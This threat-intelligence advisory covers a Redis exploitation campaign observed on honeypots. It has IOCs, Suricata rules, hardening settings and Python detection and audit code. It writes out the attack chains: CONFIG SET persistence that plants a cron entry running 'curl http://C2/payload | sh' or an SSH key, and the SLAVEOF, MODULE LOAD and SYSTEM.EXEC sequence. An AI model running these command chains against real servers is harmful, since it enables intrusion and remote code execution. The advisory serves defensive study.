TLP:CLEAR MEDIUM ACTIVE

Redis Rogue-Master Exploitation Campaign

Published 2026-06-24 · Source: distributed honeypot fleet · Confidence: HIGH

234K total events · 3,550 unique IPs · 117 rogue-master IPs · 108 module-exec IPs

Executive Summary

Over a 30-day window, sensors observed large-scale Redis exploitation activity from 3,550 unique source IPs. The campaign comprises three distinct attack patterns: (1) cron/SSH key persistence via CONFIG SET + SET + SAVE, the classic Redis-to-cron attack; (2) rogue-master replication via SLAVEOF combined with MODULE LOAD and SYSTEM.EXEC for remote code execution; and (3) a cluster of crafted binary frames that do not conform to RESP, consistent with protocol fuzzing or generic probing (no specific parser vulnerability has been identified from the captured data).

The rogue-master + module-exec pattern is particularly concerning — 117 IPs attempted SLAVEOF to establish a malicious replication relationship, and 108 IPs attempted MODULE LOAD + SYSTEM.EXEC for arbitrary code execution. The top operator (8.218.74.162) ran the full exploitation suite: 772 SLAVEOF + 514 MODULE + 4,124 CONFIG commands.

Threat Actor Profile

Attribute        Assessment
Campaign type    Mass Redis exploitation — three concurrent attack patterns
Actors           3,550 unique IPs; ~117 rogue-master operators; ~108 module-exec operators
Sophistication   Medium — known Redis attack techniques, but at scale and coordinated
Intent           Persistence (cron/SSH keys), RCE (module loading), scanner propagation
First observed   2026-05-25
Last observed    2026-06-24 (active)

Attack Pattern 1 — Cron / SSH Key Persistence

The classic Redis-to-cron attack abuses the fact that Redis writes its RDB snapshot to dir/dbfilename, and that both can be changed at runtime with CONFIG SET (unconditionally before Redis 7; on Redis 7 only when enable-protected-configs is yes). The attacker points them at a cron or SSH directory, stores a key whose value is the line to inject, and forces a SAVE. The resulting file is a binary RDB with the injected line inside it, and the attack works because cronie (RHEL family) and the OpenSSH authorized_keys parser skip lines they cannot parse while still honouring the valid one; Debian-family cron is commonly reported to reject a crontab that contains unparsable lines. It also requires Redis to have write access to the target directory, which for /var/spool/cron and /root/.ssh means an instance running as root:

# Cron persistence pattern (observed from 201.20.85.122 — 5,225 CONFIG events)
FLUSHALL                          # Clear existing data so the dump holds little besides the payload (1,151 events)
CONFIG SET dir /var/spool/cron    # Redirect the RDB dump to the cron spool (cronie layout; Debian cron keeps
                                  # user crontabs under /var/spool/cron/crontabs instead)
CONFIG SET dbfilename root        # Dump file name = crontab owner, so the file becomes root's crontab
SET x '\n* * * * * curl http://C2/payload | sh\n'  # Cron entry; the \n padding puts it on its own line
                                                   # inside the binary RDB (4,636 SET events)
SAVE                              # Force the write to disk (2,913 SAVE events)

# SSH key persistence variant (needs Redis running as root to write /root/.ssh):
CONFIG SET dir /root/.ssh
CONFIG SET dbfilename authorized_keys
SET x '\nssh-rsa AAAAB3NzaC1yc2EAAAA...\n'  # sshd ignores the unparsable RDB bytes and accepts this line
SAVE

Top Cron Persistence Operators

IP              CONFIG  SET    SAVE   FLUSHALL  Notes
201.20.85.122   5,225   4,636  2,913  1,151     Full cron injection suite
8.218.74.162    4,124   -      -      -         Also top rogue-master operator
47.86.176.78    1,152   -      -      -         Also rogue-master operator
106.75.16.140   920     -      -      -         Also rogue-master operator
87.249.134.4    836     -      -      -         Full suite: CONFIG + INFO + SLAVEOF + MODULE
(- = not reported for this IP)

Attack Pattern 2 — Rogue Master + Module Execution

The rogue-master attack uses SLAVEOF to turn the target Redis into a replica of a server the attacker controls. Before that, the attacker points dir and dbfilename at a writable path and a .so file name (the CONFIG commands seen alongside SLAVEOF from these operators). When the new replica performs its full resynchronisation, the rogue master answers the PSYNC with an arbitrary byte stream in place of a real RDB snapshot; Redis writes that stream to dir/dbfilename before trying to parse it, so a compiled Redis module lands on disk even though the RDB load itself fails. MODULE LOAD then loads it, and the module registers a command (SYSTEM.EXEC in this campaign) that runs arbitrary shell commands as the Redis user. Two Redis 7 defaults break this chain: CONFIG SET dir/dbfilename is refused unless enable-protected-configs is yes, and MODULE LOAD is refused unless enable-module-command is yes (or local). Note that REPLICAOF has been an alias of SLAVEOF since Redis 5, so detections keyed on the SLAVEOF string alone miss it:

# Rogue-master replication + module execution
CONFIG SET dir /path/to            # Writable drop directory for the incoming "RDB" (the CONFIG
CONFIG SET dbfilename malicious.so # commands seen alongside SLAVEOF from these operators)
SLAVEOF 8.218.74.162 6379          # Become replica of attacker (772 events); the replica sends PSYNC,
                                   # the rogue master answers +FULLRESYNC plus a bulk payload that is
                                   # the .so, and Redis writes it to dir/dbfilename
MODULE LOAD /path/to/malicious.so  # Load the module (514 events); refused on Redis 7 unless
                                   # enable-module-command is yes
SYSTEM.EXEC 'curl http://C2/payload | sh'  # Module-registered command, runs as the redis user (1,214 events)
SLAVEOF NO ONE                     # Break replication

Top Rogue-Master / Module-Exec Operators

IP               SLAVEOF  MODULE  CONFIG  INFO   Notes
8.218.74.162     772      514     4,124   -      Most active — full exploitation suite
47.86.176.78     216      144     1,152   -
39.108.85.106    142      96      -       -
87.249.134.4     117      60      836     8,575  Heavy INFO scanning + full exploit suite
106.75.16.140    86       57      920     -
47.242.120.223   69       46      -       -
23.234.72.111    56       28      -       2,124
103.228.37.7     12       -       -       -      SLAVEOF only
(- = not reported for this IP)

Attack Pattern 3 — Binary Protocol Fuzzing

A distinct cluster of 17 IPs sends frames that do not conform to RESP at all. The payload \x03*%\xe0COOKIE: opens with a control byte (\x03) that is neither a RESP type prefix nor printable, followed by * (the RESP array prefix that every client command normally starts with; it is not a MULTI/EXEC marker), then % and \xe0 where a decimal array length and its \r\n terminator belong, and finally the plaintext string COOKIE:. A stock Redis server reads any frame that does not begin with * as an inline command; this one carries no newline, so the server simply waits for the rest of the line and never executes anything. Nothing in the captured data shows the payload having an effect on any parser, so it is best read as a fuzzing or generic probe rather than as a known Redis exploit.

# Binary protocol attack (11,119 events from 17 IPs)
\x03 * % \xe0 COOKIE:

# Byte breakdown:
\x03    = control byte; not a RESP type (RESP2 types: + - : $ *) and not a legal start of an inline command
*       = RESP array type prefix, the normal start of a client command (not a MULTI/EXEC marker)
%       = not a decimal digit, so invalid where the array length belongs
          (% is the RESP3 map prefix, which only appears in server replies)
\xe0    = high byte where the \r\n terminator of the length line belongs; looks like a
          parser-confusion attempt, but nothing in the data shows an overflow or crash
COOKIE: = plaintext trailer; not a Redis command
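All three patterns are easier to recognise by parsing the captured client frames than by matching raw bytes, because a client can send the same command in two encodings. The following Python is an added example, not code from the report or its honeypot sensors: parse_resp handles both the inline and the multibulk RESP encodings, detect tracks the CONFIG SET dir + SAVE chain (pattern 1), the SLAVEOF + MODULE LOAD + module-command chain (pattern 2) and rejected frames (pattern 3) per source IP, and pcre_matches shows that a whitespace-based regex such as dir\s+/var/spool/cron matches the inline encoding but not the multibulk encoding that redis-cli and client libraries emit. The event tuple format, the function names, the 203.0.113.x and 198.51.100.x addresses, the c2.invalid host and the session contents are all constructed for illustration.

```python
"""RESP parser and per-source attack-chain detector for Redis honeypot captures.
Added example, not code from the report or its sensors: the event shape
(src_ip, raw client bytes), the 203.0.113.x/198.51.100.x addresses, the
c2.invalid host and the sample session are constructed for illustration."""
import re
import shlex
from collections import defaultdict

# Directories the report sees targeted with CONFIG SET dir before SAVE.
PERSISTENCE_DIRS = {"/var/spool/cron", "/etc/cron.d", "/root/.ssh"}

def parse_resp(raw: bytes):
    """Parse one client frame into (argv, error). Redis treats a frame that
    starts with '*' as multibulk (what redis-cli and client libraries send)
    and anything else as an inline command (what raw attack scripts send)."""
    if raw[:1] == b"*":
        m = re.match(rb"\*(\d+)\r\n", raw)
        if not m:
            return None, "invalid multibulk length"
        argc, pos, argv = int(m.group(1)), m.end(), []
        for _ in range(argc):
            m = re.match(rb"\$(\d+)\r\n", raw[pos:])
            if not m:
                return None, "invalid bulk length"
            start = pos + m.end()
            end = start + int(m.group(1))
            argv.append(raw[start:end].decode("latin-1"))
            pos = end + 2                       # skip the bulk's trailing \r\n
        return argv, None
    # Inline path: control bytes other than TAB/CR/LF never belong in a command line.
    for i, b in enumerate(raw):
        if b < 0x20 and b not in (0x09, 0x0A, 0x0D):
            return None, f"non-printable byte 0x{b:02x} at offset {i}"
    if not raw.endswith(b"\n"):
        return None, "inline frame without newline terminator"
    line = raw.rstrip(b"\r\n").decode("latin-1")
    try:
        return shlex.split(line), None          # keeps quoted args (SET x "...") intact
    except ValueError:
        return line.split(), None               # unbalanced quotes: best-effort split

def detect(events):
    """Map source IP -> sorted findings, tracking chains per source in arrival order:
    SAVE counts only after dir was pointed at a persistence directory (pattern 1),
    MODULE LOAD only after SLAVEOF/REPLICAOF (pattern 2), rejected frames are anomalies."""
    state, findings = defaultdict(dict), defaultdict(set)
    for ip, raw in events:
        argv, err = parse_resp(raw)
        if err:
            findings[ip].add(f"resp_anomaly:{err}")
            continue
        if not argv:
            continue
        verb, st = argv[0].upper(), state[ip]
        if verb == "CONFIG" and len(argv) >= 4 and argv[1].upper() == "SET":
            if argv[2].lower() == "dir" and argv[3].rstrip("/") in PERSISTENCE_DIRS:
                st["persist_dir"] = argv[3]
        elif verb in ("SAVE", "BGSAVE") and "persist_dir" in st:
            findings[ip].add(f"persistence_write:{st['persist_dir']}")
        elif verb in ("SLAVEOF", "REPLICAOF") and len(argv) >= 3:
            if argv[1].upper() == "NO":         # SLAVEOF NO ONE ends replication
                st.pop("rogue_master", None)
            else:
                st["rogue_master"] = f"{argv[1]}:{argv[2]}"
        elif verb == "MODULE" and len(argv) >= 3 and argv[1].upper() in ("LOAD", "LOADEX"):
            st["module"] = argv[2]
            if "rogue_master" in st:
                findings[ip].add(f"rogue_master_module_load:{st['rogue_master']}")
        elif "." in verb and "module" in st:    # module commands are namespaced, e.g. SYSTEM.EXEC
            findings[ip].add(f"module_command_exec:{verb}")
    return {ip: sorted(f) for ip, f in findings.items()}

def encode_multibulk(*args: str) -> bytes:
    """Encode a command the way redis-cli and client libraries do."""
    out = b"*%d\r\n" % len(args)
    for a in args:
        out += b"$%d\r\n%s\r\n" % (len(a.encode()), a.encode())
    return out

# Whitespace-based pattern in the style of a Suricata pcre for CONFIG SET dir.
DIR_PCRE = re.compile(rb"dir\s+/(var/spool/cron|root/\.ssh|etc/cron\.d)", re.I)

def pcre_matches(raw: bytes) -> bool:
    return DIR_PCRE.search(raw) is not None

# Constructed session: pattern 1 sent inline, pattern 2 multibulk, pattern 3 raw bytes.
SAMPLE_EVENTS = [
    ("203.0.113.10", b"CONFIG SET dir /var/spool/cron\r\n"),
    ("203.0.113.10", b"CONFIG SET dbfilename root\r\n"),
    ("203.0.113.10", b'SET x "\\n* * * * * curl http://c2.invalid/p | sh\\n"\r\n'),
    ("203.0.113.10", b"SAVE\r\n"),
    ("203.0.113.20", encode_multibulk("SLAVEOF", "198.51.100.5", "6379")),
    ("203.0.113.20", encode_multibulk("MODULE", "LOAD", "/tmp/exp.so")),
    ("203.0.113.20", encode_multibulk("SYSTEM.EXEC", "id")),
    ("203.0.113.20", encode_multibulk("SLAVEOF", "NO", "ONE")),
    ("203.0.113.30", b"\x03*%\xe0COOKIE:"),
    ("203.0.113.40", encode_multibulk("PING")),
]
```

Running detect(SAMPLE_EVENTS) yields one persistence_write finding for 203.0.113.10, a rogue_master_module_load and a module_command_exec finding for 203.0.113.20, a resp_anomaly for 203.0.113.30 and nothing for the PING-only source; pcre_matches returns True for the inline CONFIG SET dir frame and False for the same command in multibulk form, which is the gap a stream rule needs to close by also accepting the $<len>\r\n separator between arguments.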

Binary Fuzzing IPs

IP               Events  Notes
88.214.25.123    1,737   Both redis.command and redis.unknown_verb variants
194.165.16.165   1,727
194.165.16.166   1,665   Adjacent IP — same /24 subnet
194.165.16.167   1,604   Adjacent IP — same /24 subnet
45.227.254.155   1,576

Command Distribution

Command            Events  Unique IPs  Purpose
CONFIG             27,452  311         Set dir/dbfilename for persistence
INFO               19,078  1,564       Server profiling / version detection
SET                15,631  269         Payload injection into Redis keys
SAVE               9,937   244         Force dataset write to filesystem
FLUSHALL           3,844   142         Destructive flush before injection
PING               2,891   905         Connectivity check / scanner probe
GET                2,067   513         Data exfiltration attempt
SLAVEOF            2,008   117         Rogue-master replication
SYSTEM.EXEC        1,214   108         Command execution via loaded module
MODULE             1,308   115         Load malicious .so module
\x03*%\xe0COOKIE:  11,119  17          Binary protocol fuzzing

MITRE ATT&CK Mapping

ID         Technique                          Evidence
T1190      Exploit Public-Facing Application  Unauthenticated Redis API exploitation (no AUTH required)
T1105      Ingress Tool Transfer              SLAVEOF pulls the .so module from the rogue master as the replication payload
T1059.004  Unix Shell                         SYSTEM.EXEC executes arbitrary shell commands via the loaded module
T1053.003  Cron                               CONFIG SET dir /var/spool/cron + SAVE writes a cron entry
T1098.004  SSH Authorized Keys                CONFIG SET dir /root/.ssh + SAVE writes authorized_keys
T1210      Exploitation of Remote Services    MODULE LOAD of the transferred module for code execution on the Redis host
T1046      Network Service Discovery          19,078 INFO commands from 1,564 IPs (see Command Distribution); mass Redis server discovery

Indicators of Compromise

Rogue-Master / Module-Exec IPs

8.218.74.162 — 772 SLAVEOF + 514 MODULE + 4,124 CONFIG (most active)
47.86.176.78 — 216 SLAVEOF + 144 MODULE + 1,152 CONFIG
39.108.85.106 — 142 SLAVEOF + 96 MODULE
87.249.134.4 — 117 SLAVEOF + 60 MODULE + 836 CONFIG + 8,575 INFO
106.75.16.140 — 86 SLAVEOF + 57 MODULE + 920 CONFIG
47.242.120.223 — 69 SLAVEOF + 46 MODULE
23.234.72.111 — 56 SLAVEOF + 28 MODULE + 2,124 INFO
103.228.37.7 — 12 SLAVEOF

Cron Persistence IPs

201.20.85.122 — 5,225 CONFIG + 4,636 SET + 2,913 SAVE + 1,151 FLUSHALL

Binary Protocol Fuzzing IPs

88.214.25.123 · 194.165.16.165 · 194.165.16.166 · 194.165.16.167 · 45.227.254.155

Protocol IOC

\x03*%\xe0COOKIE: — binary RESP fuzzing payload
SLAVEOF + MODULE LOAD + SYSTEM.EXEC — rogue-master RCE chain
CONFIG SET dir /var/spool/cron — cron persistence pattern
CONFIG SET dir /root/.ssh — SSH key persistence pattern

Detection Signatures

Suricata — Redis SLAVEOF from External Source

alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (
  msg:"cowrAI Redis SLAVEOF rogue-master replication attack";
  flow:to_server,established;
  content:"SLAVEOF";
  nocase;
  threshold:type both, track by_src, count 3, seconds 60;
  classtype:trojan-activity; sid:9003050001; rev:1;
)

This rule matches the SLAVEOF spelling only; REPLICAOF, the alias Redis 5+ documents in its place, needs a copy of the rule with content:"REPLICAOF" (or a pcre covering both) deployed alongside it. SLAVEOF NO ONE also matches, so the 3-in-60-seconds threshold is what keeps a single legitimate failover from alerting.

Suricata — Redis MODULE LOAD + SYSTEM.EXEC

alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (
  msg:"cowrAI Redis MODULE LOAD for code execution";
  flow:to_server,established;
  content:"MODULE";
  nocase;
  content:"LOAD"; distance:0;
  classtype:trojan-activity; sid:9003050002; rev:1;
)

alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (
  msg:"cowrAI Redis SYSTEM.EXEC module command execution";
  flow:to_server,established;
  content:"SYSTEM.EXEC";
  nocase;
  classtype:trojan-activity; sid:9003050003; rev:1;
)

Suricata — Redis CONFIG SET dir (Cron/SSH Persistence)

alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (
  msg:"cowrAI Redis CONFIG SET directory manipulation (cron/SSH persistence)";
  flow:to_server,established;
  content:"CONFIG";
  nocase;
  content:"SET"; distance:0;
  content:"dir"; distance:0;
  pcre:"/dir(\s+|\r\n\$\d+\r\n)\/(var\/spool\/cron|root\/\.ssh|etc\/cron\.d)/i";
  classtype:trojan-activity; sid:9003050004; rev:2;
)

The pcre accepts both encodings a client can use: the inline form (CONFIG SET dir /var/spool/cron\r\n, arguments separated by spaces) and the multibulk form emitted by redis-cli and every client library, where each argument is preceded by its own $<len>\r\n length line. A whitespace-only separator (dir\s+/) would match the inline form alone and miss any attacker driving the attack through a proper client.

Suricata — Binary Protocol Fuzzing

alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (
  msg:"cowrAI Redis binary protocol fuzzing (RESP frame anomaly)";
  flow:to_server,established;
  content:"|03 2a 25 e0|";
  content:"COOKIE:"; distance:0;
  threshold:type both, track by_src, count 10, seconds 60;
  classtype:attempted-exploit; sid:9003050005; rev:1;
)

Redis Hardening Recommendations

# 1. Bind to loopback only (Redis 7 syntax; the compiled-in default when no bind
#    directive is present is every interface) and keep protected mode on
bind 127.0.0.1 -::1
protected-mode yes

# 2. Require authentication (Redis 6+: requirepass sets the default user's
#    password; prefer ACL users for anything beyond a single shared secret)
requirepass <strong-password>

# 3. Disable dangerous commands. REPLICAOF is an alias of SLAVEOF since Redis 5
#    and must be renamed as well. Do NOT list module commands such as
#    SYSTEM.EXEC here: rename-command only accepts commands that exist at
#    config load, and Redis refuses to start otherwise. On Redis 7 the ACL
#    route is preferred: ACL SETUSER default -@dangerous (or an aclfile entry)
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""

# 4. Redis 7+: keep dir/dbfilename locked against CONFIG SET and keep MODULE
#    and DEBUG disabled. "no" is the default for all three; "yes" re-enables them
enable-protected-configs no
enable-module-command no
enable-debug-command no

# 5. Firewall port 6379: deny all external access
iptables -A INPUT -p tcp --dport 6379 ! -s 127.0.0.1 -j DROP
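To check a deployed configuration against the points above without connecting to the server, the following Python audits a redis.conf offline. It is an added example, not part of the report or of the Redis project: it evaluates the weak settings typical of an exposed instance beside the hardened settings, applying the Redis 7 defaults for any directive that is absent (no bind line means every interface; enable-protected-configs and enable-module-command default to no), and flags a rename-command entry for a module command, which would stop Redis from starting. The function names, the finding codes, both sample configurations and the simplified ACL check (only -@dangerous or -@all on a user line counts as restricting the four commands) are constructed for illustration.

```python
"""Offline audit of a redis.conf against the hardening points above.
Added example, not part of the report or of the Redis project: the finding
names and both sample configurations are constructed for illustration."""
import shlex

# Built-ins the report sees abused; all of them sit in the @dangerous ACL category.
DANGEROUS = ("CONFIG", "SLAVEOF", "REPLICAOF", "MODULE")

def parse_conf(text: str) -> dict:
    """Return {directive: [argv, ...]} with comments and blank lines dropped."""
    directives = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)            # handles quoted values such as requirepass "..."
        if parts:
            directives.setdefault(parts[0].lower(), []).append(parts[1:])
    return directives

def _last(d: dict, key: str, default: list) -> list:
    """Redis applies the last occurrence of a repeated directive."""
    return d[key][-1] if key in d else default

def audit(text: str) -> list:
    """Return finding codes for a redis.conf. Absent directives take Redis 7
    defaults: no bind line means every interface; enable-protected-configs
    and enable-module-command default to no."""
    d, findings = parse_conf(text), []
    if any(a.lstrip("-") not in ("127.0.0.1", "::1") for a in _last(d, "bind", ["*", "-::*"])):
        findings.append("bind-non-loopback")
    if _last(d, "protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode-off")
    # Authentication: requirepass, inline ACL users, or an external aclfile.
    if not _last(d, "requirepass", [""])[0] and "user" not in d and "aclfile" not in d:
        findings.append("no-auth")
    if _last(d, "enable-protected-configs", ["no"])[0].lower() != "no":
        findings.append("protected-configs-enabled")   # CONFIG SET dir/dbfilename allowed
    if _last(d, "enable-module-command", ["no"])[0].lower() != "no":
        findings.append("module-command-enabled")
    # Dangerous commands must be disabled by rename-command or removed from the default
    # user's ACL (simplified: any user line carrying -@dangerous or -@all counts).
    renamed = {argv[0].upper() for argv in d.get("rename-command", []) if len(argv) == 2}
    acl_restricted = any("-@dangerous" in argv or "-@all" in argv for argv in d.get("user", []))
    for cmd in DANGEROUS:
        if cmd not in renamed and not acl_restricted:
            findings.append(f"unrestricted:{cmd}")
    # rename-command only accepts commands that exist at config-load time; a module
    # command such as SYSTEM.EXEC does not, and Redis refuses to start on it.
    for cmd in sorted(renamed):
        if "." in cmd:
            findings.append(f"bad-rename:{cmd}")
    return findings

# Constructed: the exposed-instance settings the campaign relies on ...
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
enable-protected-configs yes
rename-command SYSTEM.EXEC ""
"""

# ... and the hardened equivalent of the recommendations above.
HARDENED_CONF = """
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass "correct horse battery staple"
enable-protected-configs no
enable-module-command no
enable-debug-command no
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
"""

if __name__ == "__main__":
    print("weak:    ", audit(WEAK_CONF))
    print("hardened:", audit(HARDENED_CONF))
```

audit(WEAK_CONF) reports the exposed bind, protected mode off, missing authentication, protected configs unlocked, all four dangerous commands unrestricted and the rename-command entry that would abort startup; audit(HARDENED_CONF) returns an empty list. An empty file is not safe either: with every directive at its default the audit still reports the all-interfaces bind, missing authentication and the four unrestricted commands.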

Collection Methodology

Data collected by a distributed honeypot fleet running custom protocol lures that emulate exposed Redis instances. All Redis commands — including both valid RESP-protocol commands and invalid binary frames — were captured at the application layer and ingested into a time-series database. Command frequencies, source IP correlation, and attack pattern clustering were performed offline to identify the three distinct attack patterns documented in this report.